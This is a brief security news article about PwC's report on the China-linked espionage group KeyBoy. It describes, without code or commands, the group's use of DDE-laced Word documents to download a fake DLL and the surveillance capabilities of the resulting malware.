Security researchers have discovered Chinese APT group KeyBoy back on the scene with new tools and techniques targeting Western organizations.
It’s been around a year since the last sighting of the group, according to PwC threat intelligence analyst, Bart Parys.
“KeyBoy is believed by the industry to be a hacking group based in or operating from China, and is mainly engaged in espionage activity,” he explained in a blog post.
“In the past it has targeted organizations and individuals in Taiwan, Tibet, and the Philippines, but in its latest campaign, KeyBoy appears to have expanded its targeting, as it now appears to be going after mostly Western organizations, likely for corporate espionage purposes.”
The group was observed using a specially crafted Microsoft Word document using the Dynamic Data Exchange (DDE) protocol to fetch/download remote payloads.
In the example given, it is a fake DLL downloaded using PowerShell.
Once the malware has been installed, the original DLL is deleted, with pop-ups blocked on the machine so the user has no idea what has happened.
The malware in question is designed to take screenshots, gather system information, browse and download files, shutdown and reboot victim machines and use custom SSL libraries to hide C&C traffic.
PwC claimed the group is capable of at least a medium level of technical and operational know-how.
“Several connections can be made to CitizenLab’s report from 2016, such as the continued usage of fake services and related DLLs, powerful capabilities, several exports and strings present in the (sometimes decrypted) DLLs, as well as campaign or version identifiers which are reminiscent and consistent with earlier reported identifiers”, it added.
We reported the group as far back as 2013 targeting Southeast Asia victims via malicious Word documents.
PwC has a list of potential indicators of compromise for security teams to check here.